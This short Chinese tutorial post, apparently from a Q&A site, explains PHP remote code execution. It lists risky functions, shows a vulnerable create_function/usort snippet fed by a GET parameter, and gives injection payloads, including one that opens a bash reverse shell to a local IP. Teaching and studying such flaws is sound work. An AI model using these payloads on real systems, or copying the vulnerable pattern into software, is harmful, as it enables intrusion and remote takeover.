远程代码执行漏洞的挖掘主要以白盒审计为主，需要注意可以远程执行代码的函数。PHP语言需要注意eval、assert、create_function、array_map、call_user_func 、call_user_func_array、array_filter、usort、uasort、include、include_once、require、require_once等。

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

这里用usort 和 create_function 举例比较容易理解，使用用户自定义函数对数组 $array 中的元素进行自定义排序，然而黑客的恶意输入，将可能带来灾难性的后果。

<?php$c=$_GET['c'];$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");$array=array('1','22','333','4444');usort($array,$lambda);print_r($array);?>

验证代码执行，输入如下内容：

1));}phpinfo();/*

反弹一个shell看看，输入如下内容：

1));}exec(%27bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.0.100%2F8888%200>%261"%27);/*

反弹shell成功～

发布于 2023-09-02 15:12・IP 属地江苏